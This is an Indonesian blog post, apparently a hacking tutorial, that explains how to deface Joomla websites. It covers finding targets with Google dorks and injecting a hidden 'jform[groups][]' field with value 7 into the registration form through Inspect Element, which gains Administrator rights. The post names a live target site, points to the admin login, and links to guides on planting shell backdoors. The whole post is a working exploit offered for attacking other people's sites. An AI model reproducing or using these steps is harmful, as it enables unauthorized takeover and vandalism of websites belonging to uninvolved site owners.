Deface dengan Com User | Inspect Element

Selamat malam sobat bloggers, kali ini saya mau share tutorial deface dengan Com User | Inspect Element, ok langsung saja ;)

Live target : http://teseme.com/

 Langkah - Langkah :

1. Pertama-tama kita cari target dulu di google dengan dork ( Google Dork )
2. Setelah mendapatkan target. langkah selanjutnya adalah pergi ke halaman Registrasi Web tersebut
dengan menambahkan: index.php?option=com_users&view=registration
Disini target saya adalah : http://teseme.com/ 
Jadi saya harus pergi ke : http://teseme.com/index.php?option=com_users&view=registration
3. Lalu anda akan melihat tampilan registrasi sebuah web CMS Joomla seperti gambar dibawah ini

4. Lalu isikan Nama, Username, Password(Password yang berbeda), dan Email
   Contoh password :
   Password : ganteng
  Confirm Password : tampan

5. Pada kotak Confirm Email Addres, kita klik kanan lalu klik Inspect Element

6. Lalu klik kanan yang berwarna biru itu, dan pilih Edit As HTML
 7. Setelah itu masukan kode Exploit berikut : 

<dd><input value="7" name="jform[groups][]" /></ dd>

* Value 7 menunjukan kita berada di Administrator Grup bukan di Super User grup yang ada di Value 8
8. Lalu klik Register 
9. Setelah diklik register, maka akan muncul bacaan seperti ini ' The passwords you entered do not match. Please enter your desired password in the password field and confirm your entry by entering it in the confirm password field. ' setelah itu tinggal masukin lagi passwordnya ( password yang sama ) lalu klik register
10. Jika ada bacaan seperti ini ' Your account has been created and an activation link has been sent to the email address you entered. Note that you must activate the account by clicking on the activation link when you get the email before you can login. ' tandanya registrasi kita berhasil, dan kita tinggal buka email yang tadi kita daftarkan, setelah itu kita klik Kode Aktivitas yang diberikan oleh web tersebut

NB : Jika ada bacaan ERROR, itu tandanya kita harus cari target lain :D 

11. Setelah kita klik Kode Aktivitas itu, tinggal login deh di Administratornya ^_^
Alamat web : http://teseme.com
Letak login administratornya : http://teseme.com/administrator

 12. Setelah login berhasil, maka tampilannya akan seperti ini : 
JIKA TIDAK BISA LOGIN KE HALAMAN ADMINNYA, MAKA SAYA SARANKAN ANDA CARI TARGET LAIN :p
GOOD LUCK !!!!

Bagaimana cara pasang shell backdoor di web joomla ? disini
Bagaimana cara tebas index di web joomla tanpa pasang shell ? disini
Bagaimana cara tebas index di web joomla lewat shell ? silahkan cari di post lainnya :D

0 Response to "Deface dengan Com User | Inspect Element"

Post a Comment